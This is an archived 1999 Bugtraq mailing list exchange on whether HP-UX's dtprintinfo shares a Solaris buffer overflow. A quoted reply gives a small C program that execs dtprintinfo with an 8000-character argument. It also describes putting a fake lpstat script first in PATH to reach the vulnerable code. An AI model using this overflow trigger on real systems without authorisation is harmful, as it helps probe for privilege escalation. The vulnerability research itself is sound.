Bugtraq mailing list archives

Re: [Solaris2.6,2.7 dtprintinfo exploits]


From: Thiago.M.M.Zaninotti () UNILEVER COM (Thiago MM Zaninotti)
Date: Fri, 14 May 1999 12:13:47 -0300


Hi Paul,

I'm sorry for the wrong output I've provided and you are correct: csh will
complain about long strings. I've already checked it in another shell and it
didn't appear to be vulnerable to the problem.


Thiago Zaninotti
IMC LABG


-----Original Message-----
From:   Paul Hart [SMTP:hart () iserver com]
Sent:   Thursday, May 13, 1999 8:15 PM
To:     Thiago MM Zaninotti
Subject:        Re: [Solaris2.6,2.7 dtprintinfo exploits]

On Wed, 12 May 1999, Thiago MM Zaninotti wrote:

dtprintinfo in HPUX does not seem to be vulnerable to the overflow problem:

% /usr/dt/bin/dtprintinfo -p `perl -e "print 'A' x 8000"`
Pathname too long.
%

That's a message from your shell, not the dtprintinfo program; the
dtprintinfo program is never being run.  Your shell thinks that 8000
characters in an argument is too long.  You'll need to use a different
shell that can handle long arguments (I use tcsh) or make a small C
program that execs dtprintinfo with the long command argument.  This
should work:

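#include <unistd.h>
#include <string.h>
#include <stdio.h>

#define LENGTH 8000

int main(void)
{
    char buffer[LENGTH];

    /* Build a NUL-terminated argument of LENGTH - 1 'A' characters. */
    memset(buffer, 'A', LENGTH);
    buffer[LENGTH - 1] = '\0';
    /* exec directly so that no shell argument-length limit applies. */
    execl("/usr/dt/bin/dtprintinfo", "dtprintinfo", "-p", buffer, (char *)NULL);
    /* Only reached if execl() failed. */
    perror("exec failed");
    return 1;
}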

Also make sure (at least on Solaris) that you have a script in your
current directory named "lpstat" and that "." is the first element of your
PATH environment variable.  Here's what I have for my lpstat script:

#!/bin/sh
echo "system for lpprn: localhost"


